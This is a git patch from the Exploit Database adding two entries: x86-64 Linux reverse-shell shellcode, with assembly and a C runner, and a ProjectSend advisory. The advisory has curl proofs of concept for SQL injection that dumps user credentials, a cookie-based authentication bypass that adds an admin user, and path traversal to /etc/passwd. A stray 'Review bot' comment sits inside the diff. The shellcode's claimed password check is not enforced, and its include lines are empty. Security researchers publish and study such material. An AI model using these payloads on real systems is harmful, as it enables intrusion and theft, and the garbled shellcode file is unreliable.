From bf22eb1691d0649bd8d25b96f8089db54e18030e Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 30 Jan 2016 05:03:32 +0000
Subject: [PATCH] DB: 2016-01-30 2 new exploits
---
 files.csv | 3 +-
 platforms/lin_x86-64/shellcode/39383.c | 110 ++++++++++++++++++++
 platforms/php/webapps/39385.txt | 133 +++++++++++++++++++++++++
 3 files changed, 245 insertions(+), 1 deletion(-)
 create mode 100755 platforms/lin_x86-64/shellcode/39383.c
 create mode 100755 platforms/php/webapps/39385.txt
diff --git a/files.csv b/files.csv
index 4b2f05acc..68e021d9c 100755
--- a/files.csv
+++ b/files.csv
@@ -32489,7 +32489,6 @@ id,file,description,date,author,platform,type,port
 36036,platforms/php/webapps/36036.txt,"BlueSoft Rate My Photo Site 'ty' Parameter SQL Injection Vulnerability",2011-08-08,darkTR,php,webapps,0
 36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server <= 4.0.2 NULL Pointer Dereference Remote Denial of Service Vulnerability",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0
 36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 - Multiple Cross Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0
-36039,platforms/php/webapps/36039.txt,"Wordpress Theme Divi - Arbitrary File Download Vulnerability",2015-02-09,"pool and Fran_73",php,webapps,0
 36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure Vulnerability",2015-02-10,"Yakir Wizman",hardware,webapps,0
 36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart - Unrestricted File Upload",2015-02-10,metasploit,php,webapps,80
 36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Include Vulnerability",2011-08-11,"RiRes Walid",php,webapps,0
@@ -35624,3 +35623,5 @@ id,file,description,date,author,platform,type,port
 39380,platforms/osx/dos/39380.c,"OS X - OSMetaClassBase::safeMetaCast in IOAccelContext2::connectClient Exploitable NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0
 39381,platforms/osx/dos/39381.c,"OS X - IOHDIXControllerUserClient::convertClientBuffer Integer Overflow",2016-01-28,"Google Security Research",osx,dos,0
 39382,platforms/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,multiple,webapps,0
+39383,platforms/lin_x86-64/shellcode/39383.c,"x86_64 Linux shell_reverse_tcp with Password - Polymorphic Version",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
+39385,platforms/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",php,webapps,80
diff --git a/platforms/lin_x86-64/shellcode/39383.c b/platforms/lin_x86-64/shellcode/39383.c
new file mode 100755
index 000000000..4a8f93c39
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/39383.c
@@ -0,0 +1,110 @@
+/*---------------------------------------------------------------------------------------------------------------------
+/*
+*Title: tcp reverse shell with password polymorphic version 122 bytes
+*Author: Sathish kumar
+*Contact: https://www.linkedin.com/in/sathish94
+*Copyright: (c) 2016 iQube. (http://iQube.io)
+*Release Date: January 29, 2016
+*Description: x64 Linux reverse TCP port shellcode on port 4444 with reconfigurable password
+*Tested On: Ubuntu 14.04 LTS
+*SLAE64-1408
+*Build/Run: gcc -fno-stack-protector -z execstack filename.c -o filename
+* ./bindshell
+* nc -l 4444 -vvv
+*
+
+
+global _start
+
+_start:
+
+ xor rax, rax ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
+ xor rsi, rsi
+ mul rsi
+ add rcx, 0x3
+ push byte 0x2 ;pusing argument to the stack
+ pop rdi ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
+ inc esi ; already rsi is 0 so incrementing the rsi register will make it 1
+ push byte 0x29 ; pushing the syscall number into the rax by using stack
+ pop rax
+ syscall
+
+ ; copying the socket descripter from rax to rdi register so that we can use it further
+
+ xchg rax, rdi
+
+ ; server.sin_family = AF_INET
+ ; server.sin_port = htons(PORT)
+ ; server.sin_addr.s_addr = INADDR_ANY
+ ; bzero(&server.sin_zero, 8)
+ ; setting up the data sctructure
+
+ xor rax, rax
+ push rax ; bzero(&server.sin_zero, 8)
+ mov ebx , 0xfeffff80 ; ip address 127.0.0.1 "noted" to remove null
+ not ebx
+ mov dword [rsp-4], ebx
+ sub rsp , 4 ; adjust the stack
+ push word 0x5c11 ; port 4444 in network byte order
+ push word 0x02 ; AF_INET
+ push rsp
+ pop rsi
+
+
+ push 0x10
+ pop rdx
+ push 0x2a
+ pop rax
+ syscall
+
+ push 0x3
+ pop rsi ; setting argument to 3
+
+
+
+duplicate:
+ dec esi
+ mov al, 0x21 ;duplicate syscall applied to error,output and input using loop
+ syscall
+ jne duplicate
+
+password_check:
+
+ push rsp
+ pop rsi
+ xor rax, rax ; system read syscall value is 0 so rax is set to 0
+ syscall
+ push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded
+ pop rax
+ lea rdi, [rel rsi]
+ scasd ; comparing the user input and stored password in the stack
+
+
+
+execve: ; Execve format , execve("/bin/sh", 0 , 0)
+ xor rsi , rsi
+ mul rsi ; zeroed rax , rdx register
+ push ax ; terminate string with null
+ mov rbx , 0x68732f2f6e69622e ; "/bin//sh" in reverse order
+ inc rbx
+ add rcx, 2
+ push rbx
+ push rsp
+ pop rdi ; set RDI
+ push byte 0x3b ; execve syscall number (59)
+ pop rax
+ syscall
+
+*/
+#include
+#include
+
+unsigned char code[] =\
+"\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x48\x83\xc1\x03\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x48\x31\xc0\x50\xbb\x80\xff\xff\xfe\xf7\xd3\x89\x5c\x24\xfc\x48\x83\xec\x04\x66\x68\x11\x5c\x66\x6a\x02\x54\x5e\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x54\x5e\x48\x31\xc0\x0f\x05\x68\x68\x61\x63\x6b\x58\x48\x8d\x3e\xaf\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2e\x62\x69\x6e\x2f\x2f\x73\x68\x48\xff\xc3\x48\x83\xc1\x02\x53\x54\x5f\x6a\x3b\x58\x0f\x05";
+main()
+{
+ printf("Shellcode Length: %d\n", (int)strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
+
diff --git a/platforms/php/webapps/39385.txt b/platforms/php/webapps/39385.txt
new file mode 100755
index 000000000..acbb0eea2
--- /dev/null
+++ b/platforms/php/webapps/39385.txt
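Review bot: The `password_check` block never gates execution: `scasd` only sets flags, no conditional branch follows it, and the first instruction under `execve:` (`xor rsi , rsi`) overwrites those flags, so the execve path runs whatever the socket read returned. The title's "with password", the `reconfigurable password` line and the files.csv description therefore overstate what the bytes do; I would document that rather than touch the encoded string, e.g. `; NOTE: scasd result is never tested - the password is not enforced` after the scasd line, and drop "with password" from the title. The header also says `./bindshell` and `server.sin_addr.s_addr = INADDR_ANY` for code that connects out to 127.0.0.1:4444, so those comment lines should be brought in line with the instructions. As rendered here the two `#include` lines carry no header name (probably lost in the page, but as shown the file does not compile) and `main()` relies on implicit int; the whole file is inside this hunk.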
@@ -0,0 +1,133 @@
+Advisory ID: SGMA-16001
+Title: ProjectSend multiple vulnerabilities
+Product: ProjectSend (previously cFTP)
+Version: r582 and probably prior
+Vendor: www.projectsend.org
+Vulnerability type: SQL-injection, Auth bypass, Arbitrary File Access, Insecure Object Reference
+Risk level: 4 / 5
+Credit: filippo.cavallarin@wearesegment.com
+CVE: N/A
+Vendor notification: 2015-11-05
+Vendor fix: N/A
+Public disclosure: 2016-01-29
+
+
+ProjectSend (previously cFTP) suffers from multiple vulnerabilities:
+
+
+- SQL Injection
+
+The script manage-files.php suffers from a SQL-Injection vulnerability because the request parameter "status" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
+The following proof-of-concept demostrates this issue by downloading login credentials of registered users:
+
+curl -X POST 'http://projectsend.local/manage-files.php?client_id=1' -H 'Cookie: PHPSESSID=hiefdo3ra5hgmpa5mrpdfhih22' --data "status=10' and 0 union select 0,1 ,'0) or 1 union select 0,1,concat(user,char(32),password),3,4,5,6,7,8,9 from tbl_users -- a',3,4,5,6,'7"
+
+
+
+- SQL Injection
+
+The script manage-files.php suffers from a SQL-Injection vulnerability because the request parameter "files" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
+The following proof-of-concept demostrates this issue by injecting a SLEEP command into the database engine:
+
+curl -X POST 'http://projectsend.local/manage-files.php' --data 'files_actions=delete&do_action=&files%5B%5D=5) OR 1=sleep(10' -H 'Cookie: PHPSESSID=hiefdo3ra5hgmpa5mrpdfhih22'
+
+
+
+- SQL Injection
+
+The script clients.php suffers from a SQL-Injection vulnerability because the request parameter "selected_clients" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
+There is no POC available, but the vulnerability is easy to spot by looking at the source code at line 63.
+
+ $selected_clients = $_POST['selected_clients'];
+ $clients_to_get = mysql_real_escape_string(implode(',',array_unique($selected_clients)));
+ $sql_user = $database->query("SELECT id, name FROM tbl_users WHERE id IN ($clients_to_get)");
+
+
+
+- SQL Injection
+
+The script clients.php suffers from a SQL-Injection vulnerability because the request parameter "status" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
+There is no POC available, but the vulnerability is easy to spot by looking at the source code at line 146.
+
+ $status_filter = $_POST['status'];
+ $cq .= " AND active='$status_filter'";
+ [...]
+ $sql = $database->query($cq);
+
+
+
+- SQL Injection
+
+The script process-zip-download.php suffers from a SQL-Injection vulnerability because the request parameter "file" is used to build a sql query without beeing properly sanitized.
+There is no POC available, but the vulnerability is easy to spot by looking at the source code.
+
+ $files_to_zip = explode(',',substr($_GET['file'], 0, -1));
+ [...]
+ foreach ($files_to_zip as $file_to_zip) {
+ [...]
+ $sql_url = $database->query('SELECT id, expires, expiry_date FROM tbl_files WHERE url="' .
$file_to_zip .'"');
+
+
+
+- SQL Injection
+
+The script home-log.php suffers from a SQL-Injection vulnerability because the request parameter "action" is used to build a sql query without beeing properly sanitized.
+There is no POC available, but the vulnerability is easy to spot by looking at the source code.
+
+ $log_action = $_GET['action'];
+ $log_query = "SELECT * FROM tbl_actions_log";
+ if (!empty($log_action)) {
+ $log_query .= " WHERE action = '$log_action'";
+
+
+
+- Authentication Bypass
+
+An Authenticaton Bypass vulnerability has been discovered in multiple pages. By adding a cookie to request it is possible to bypass certain authentication checks and gain access to protected resources.
+The following proof-of-concepts are available:
+
+Lists all registered users:
+curl http://projectsend.local/users.php -H 'Cookie: userlevel=9'
+
+Add an Admin user to the database:
+curl http://projectsend.local/users-add.php -H 'Cookie: userlevel=9' -X POST --data 'add_user_form_name=necci&add_user_form_email=poplix@papuasia.org&add_user_form_level=9&add_user_form_user=necci&add_user_form_active=1&add_user_form_pass=123456'
+
+Read file statsictics:
+curl http://projectsend.local/home.php -H 'Cookie: userlevel=9'
+
+Read file details:
+curl http://projectsend.local/edit-file.php?file_id=1 -H 'Cookie: userlevel=9'
+
+Bypass authentication:
+curl 'http://projectsend.local/process-zip-download.php' -H 'Cookie: userlevel=8'
+
+
+- Arbitrary File Download
+
+The page process-zip-download.php fails to restrict access to local files. By injecting a path traversal vector into the "file" parameter it is possible to read an arbitrary file from the server.
+By combining this vulnerability with the Authentication Bypass affecting the same file, is possible for a non-authenticated user to gain access to protected data.
+The followinf proof-of-concept is available.
+
+curl 'http://projectsend.local/process-zip-download.php?file=../../../../../../../../etc/passwdd' -H 'Cookie: userlevel=8' > ttt.zip
+
+
+- Insecure Direct Object References
+
+The page actions.log.export.php fails to perform authentication checks so it's possible for anyone to access logs data.
+The followinf proof-of-concept is available.
+
+curl http://projectsend.local/includes/actions.log.export.php
+
+
+Solution
+No solution is available at the time of writing.
+The vendor has been contacted about three months before the public disclosure, but he stopped responding after we sent him our report.
+
+
+References
+https://www.wearesegment.com/research/Projectsend_multiple_vulnerabilities
+http://www.projectsend.org
+
+
+Filippo Cavallarin
+https://wearesegment.com
\ No newline at end of file